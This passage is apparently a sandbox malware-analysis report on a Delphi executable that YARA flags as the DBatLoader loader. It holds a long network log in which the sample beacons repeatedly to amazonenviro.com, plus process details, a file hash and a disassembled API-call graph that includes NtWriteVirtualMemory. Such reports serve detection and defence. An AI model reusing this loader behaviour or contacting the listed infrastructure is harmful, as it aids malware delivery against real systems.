                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      51192.168.2.750077166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:42 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:43 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:43 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      52192.168.2.750079166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:44 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:44 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:44 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      53192.168.2.750081166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:45 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:46 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:46 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      54192.168.2.750083166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:47 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:48 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:47 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      55192.168.2.750085166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:49 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:49 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:49 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      56192.168.2.750087166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:50 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:51 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:51 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      57192.168.2.750089166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:52 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:52 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:52 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      58192.168.2.750091166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:53 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:54 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:54 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      59192.168.2.750093166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:55 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:56 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:56 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      60192.168.2.750095166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:57 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:57 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:57 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      61192.168.2.750097166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:58 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:59 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:59 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      62192.168.2.750099166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:26:00 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:26:01 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:26:00 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      63192.168.2.750101166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:26:02 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:26:02 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:26:02 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      64192.168.2.750103166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:26:03 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:26:04 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:26:04 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      65192.168.2.750105166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:26:05 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:26:05 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:26:05 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      66192.168.2.750107166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:26:06 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:26:07 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:26:07 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      67192.168.2.750109166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:26:08 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:26:09 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:26:08 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      68192.168.2.750111166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:26:10 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:26:10 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:26:10 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      69192.168.2.750113166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:26:11 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:26:12 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:26:12 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      70192.168.2.750115166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:26:13 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:26:14 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:26:13 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      71192.168.2.750117166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:26:15 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:26:15 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:26:15 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      72192.168.2.750119166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:26:16 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:26:17 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:26:17 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      73192.168.2.750121166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:26:18 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:26:18 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:26:18 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      74192.168.2.750123166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:26:19 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:26:20 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:26:20 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      75192.168.2.750125166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:26:21 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:26:22 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:26:22 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      System Behavior

                      General

                      Target ID:0
                      Start time:02:24:15
                      Start date:14/01/2025
                      Path:C:\Users\user\Desktop\JDQS879kiy.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\JDQS879kiy.exe"
                      Imagebase:0x400000
                      File size:1'161'216 bytes
                      MD5 hash:E9802E45A66C963CED0E7C60C899C5CD
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:Borland Delphi
                      Yara matches:
                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2622490407.0000000002356000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2636506576.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:false

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:6.4%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:14.6%
                        Total number of Nodes:268
                        Total number of Limit Nodes:16
                        execution_graph 25682 284e2e4 25683 284e2f2 VariantClear 25682->25683 25684 284e2ff 25682->25684 25696 284dfb0 25683->25696 25686 284e315 25684->25686 25687 284e306 25684->25687 25689 284e2fd 25686->25689 25690 284e336 25686->25690 25691 284e32d 25686->25691 25700 28444ac 25687->25700 25705 2852e24 EnterCriticalSection LeaveCriticalSection 25690->25705 25704 284e168 52 API calls 25691->25704 25694 284e33f 25694->25689 25695 284e34f VariantClear VariantInit 25694->25695 25695->25689 25697 284dfb4 25696->25697 25698 284dfb9 25696->25698 25706 284dd5c 43 API calls 25697->25706 25698->25689 25701 28444b2 25700->25701 25702 28444cd 25700->25702 25701->25702 25707 2842c2c 11 API calls 25701->25707 25702->25689 25704->25689 25705->25694 25706->25698 25707->25702 25708 2841c6c 25709 2841d04 25708->25709 25710 2841c7c 25708->25710 25712 2841d0d 25709->25712 25713 2841f58 25709->25713 25711 2841cc0 25710->25711 25715 2841c89 25710->25715 25718 2841724 10 API calls 25711->25718 25717 2841d25 25712->25717 25731 2841e24 25712->25731 25716 2841fec 25713->25716 25720 2841fac 25713->25720 25721 2841f68 25713->25721 25714 2841c94 25715->25714 25756 2841724 25715->25756 25723 2841d2c 25717->25723 25727 2841d48 25717->25727 25732 2841dfc 25717->25732 25737 2841cd7 25718->25737 25724 2841fb2 25720->25724 25729 2841724 10 API calls 25720->25729 25725 2841724 10 API calls 25721->25725 25722 2841e7c 25726 2841724 10 API calls 25722->25726 25743 2841e95 25722->25743 25742 2841f82 25725->25742 25745 2841f2c 25726->25745 25735 2841d79 Sleep 25727->25735 25748 2841d9c 25727->25748 25728 2841cfd 25747 2841fc1 25729->25747 25730 2841cb9 25731->25722 25734 2841e55 Sleep 25731->25734 25731->25743 25736 2841724 10 API calls 25732->25736 25733 2841fa7 25734->25722 25738 2841e6f Sleep 25734->25738 25739 2841d91 Sleep 25735->25739 25735->25748 25750 2841e05 25736->25750 25737->25728 25741 2841a8c 8 API calls 25737->25741 25738->25731 25739->25727 25740 2841ca1 25740->25730 25780 2841a8c 25740->25780 25741->25728 25742->25733 25751 2841a8c 8 API calls 25742->25751 25745->25743 25749 2841a8c 8 API calls 25745->25749 25746 2841e1d 25747->25733 25754 2841a8c 8 API calls 25747->25754 25752 2841f50 25749->25752 25750->25746 25753 2841a8c 8 API calls 25750->25753 25751->25733 25753->25746 25755 2841fe4 25754->25755 25757 284173c 25756->25757 25758 2841968 25756->25758 25768 28417cb Sleep 25757->25768 25769 284174e 25757->25769 25759 2841a80 25758->25759 25760 2841938 25758->25760 25762 2841684 VirtualAlloc 25759->25762 25763 2841a89 25759->25763 25764 2841947 Sleep 25760->25764 25773 2841986 25760->25773 25761 284175d 25761->25740 25765 28416bf 25762->25765 25766 28416af 25762->25766 25763->25740 25767 284195d Sleep 25764->25767 25764->25773 25765->25740 25797 2841644 25766->25797 25767->25760 25768->25769 25772 28417e4 Sleep 25768->25772 25769->25761 25771 284180a Sleep 25769->25771 25776 284182c 25769->25776 25775 2841820 Sleep 25771->25775 25771->25776 25772->25757 25774 28415cc VirtualAlloc 25773->25774 25777 28419a4 25773->25777 25774->25777 25775->25769 25779 2841838 25776->25779 25803 28415cc 25776->25803 25777->25740 25779->25740 25781 2841aa1 25780->25781 25782 2841b6c 25780->25782 25784 2841aa7 25781->25784 25785 2841b13 Sleep 25781->25785 25783 28416e8 25782->25783 25782->25784 25787 2841c66 25783->25787 25790 2841644 2 API calls 25783->25790 25786 2841ab0 25784->25786 25789 2841b4b Sleep 25784->25789 25794 2841b81 25784->25794 25785->25784 25788 2841b2d Sleep 25785->25788 25786->25730 25787->25730 25788->25781 25791 2841b61 Sleep 25789->25791 25789->25794 25792 28416f5 VirtualFree 25790->25792 25791->25784 25793 284170d 25792->25793 25793->25730 25795 2841c00 VirtualFree 25794->25795 25796 2841ba4 25794->25796 25795->25730 25796->25730 25798 2841681 25797->25798 25799 284164d 25797->25799 25798->25765 25799->25798 25800 284164f Sleep 25799->25800 25801 2841664 25800->25801 25801->25798 25802 2841668 Sleep 25801->25802 25802->25799 25807 2841560 25803->25807 25805 28415d4 VirtualAlloc 25806 28415eb 25805->25806 25806->25779 25808 2841500 25807->25808 25808->25805 25809 286d2fc 25819 2846518 25809->25819 25813 286d32a 25824 286bf84 timeSetEvent 25813->25824 25815 286d334 25816 286d342 GetMessageA 25815->25816 25817 286d336 TranslateMessage DispatchMessageA 25816->25817 25818 286d352 25816->25818 25817->25816 25820 2846523 25819->25820 25825 2844168 25820->25825 25823 284427c SysAllocStringLen SysFreeString SysReAllocStringLen 25823->25813 25824->25815 25826 28441ae 25825->25826 25827 2844227 25826->25827 25829 28443b8 25826->25829 25839 2844100 25827->25839 25830 28443e9 25829->25830 25834 28443fa 25829->25834 25844 284432c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 25830->25844 25833 28443f3 25833->25834 25835 284443f FreeLibrary 25834->25835 25836 2844463 25834->25836 25835->25834 25837 2844472 ExitProcess 25836->25837 25838 284446c 25836->25838 25838->25837 25840 2844143 25839->25840 25841 2844110 25839->25841 25840->25823 25841->25840 25843 28415cc VirtualAlloc 25841->25843 25845 2845814 25841->25845 25843->25841 25844->25833 25846 2845824 GetModuleFileNameA 25845->25846 25847 2845840 25845->25847 25849 2845a78 GetModuleFileNameA RegOpenKeyExA 25846->25849 25847->25841 25850 2845afb 25849->25850 25851 2845abb RegOpenKeyExA 25849->25851 25867 28458b4 12 API calls 25850->25867 25851->25850 25852 2845ad9 RegOpenKeyExA 25851->25852 25852->25850 25854 2845b84 lstrcpynA GetThreadLocale GetLocaleInfoA 25852->25854 25856 2845c9e 25854->25856 25857 2845bbb 25854->25857 25855 2845b20 RegQueryValueExA 25858 2845b40 RegQueryValueExA 25855->25858 25859 2845b5e RegCloseKey 25855->25859 25856->25847 25857->25856 25861 2845bcb lstrlenA 25857->25861 25858->25859 25859->25847 25862 2845be3 25861->25862 25862->25856 25863 2845c30 25862->25863 25864 2845c08 lstrcpynA LoadLibraryExA 25862->25864 25863->25856 25865 2845c3a lstrcpynA LoadLibraryExA 25863->25865 25864->25863 25865->25856 25866 2845c6c lstrcpynA LoadLibraryExA 25865->25866 25866->25856 25867->25855 25868 2844c48 25869 2844c4c 25868->25869 25870 2844c6f 25868->25870 25871 2844c0c 25869->25871 25872 2844c5f SysReAllocStringLen 25869->25872 25873 2844c20 25871->25873 25874 2844c12 SysFreeString 25871->25874 25872->25870 25875 2844bdc 25872->25875 25874->25873 25876 2844bf8 25875->25876 25877 2844be8 SysAllocStringLen 25875->25877 25877->25875 25877->25876 25878 286bf78 25881 285f0a8 25878->25881 25882 285f0b0 25881->25882 25882->25882 29063 2858704 LoadLibraryW 25882->29063 25884 285f0d2 29068 2842ee0 QueryPerformanceCounter 25884->29068 25886 285f0d7 25887 285f0e1 InetIsOffline 25886->25887 25888 285f0fc 25887->25888 25889 285f0eb 25887->25889 25891 2844500 11 API calls 25888->25891 29080 2844500 25889->29080 25892 285f0fa 25891->25892 29071 284480c 25892->29071 29086 28580c0 29063->29086 29065 285873d 29097 2857cf8 29065->29097 29069 2842eed 29068->29069 29070 2842ef8 GetTickCount 29068->29070 29069->25886 29070->25886 29072 284481d 29071->29072 29073 2844843 29072->29073 29074 284485a 29072->29074 29075 2844b78 11 API calls 29073->29075 29076 2844570 11 API calls 29074->29076 29078 2844850 29075->29078 29076->29078 29077 284488b 29078->29077 29079 2844500 11 API calls 29078->29079 29079->29077 29081 2844504 29080->29081 29082 2844514 29080->29082 29081->29082 29084 2844570 11 API calls 29081->29084 29083 2844542 29082->29083 29166 2842c2c 11 API calls 29082->29166 29083->25892 29084->29082 29087 2844500 11 API calls 29086->29087 29088 28580e5 29087->29088 29111 285790c 29088->29111 29092 28580ff 29093 2858107 GetModuleHandleW GetProcAddress GetProcAddress 29092->29093 29094 285813a 29093->29094 29132 28444d0 29094->29132 29098 2844500 11 API calls 29097->29098 29099 2857d1d 29098->29099 29100 285790c 12 API calls 29099->29100 29101 2857d2a 29100->29101 29102 2844798 11 API calls 29101->29102 29103 2857d3a 29102->29103 29155 2858018 29103->29155 29106 28580c0 15 API calls 29107 2857d53 NtWriteVirtualMemory 29106->29107 29108 2857d7f 29107->29108 29109 28444d0 11 API calls 29108->29109 29110 2857d8c FreeLibrary 29109->29110 29110->25884 29112 285791d 29111->29112 29136 2844b78 29112->29136 29114 2857999 29117 2844798 29114->29117 29115 285792d 29115->29114 29145 284ba3c CharNextA 29115->29145 29118 284479c 29117->29118 29119 28447fd 29117->29119 29120 28447a4 29118->29120 29121 2844500 29118->29121 29120->29119 29122 28447b3 29120->29122 29124 2844500 11 API calls 29120->29124 29125 2844570 11 API calls 29121->29125 29127 2844514 29121->29127 29126 2844570 11 API calls 29122->29126 29123 2844542 29123->29092 29124->29122 29125->29127 29129 28447cd 29126->29129 29127->29123 29153 2842c2c 11 API calls 29127->29153 29130 2844500 11 API calls 29129->29130 29131 28447f9 29130->29131 29131->29092 29133 28444d6 29132->29133 29134 28444fc 29133->29134 29154 2842c2c 11 API calls 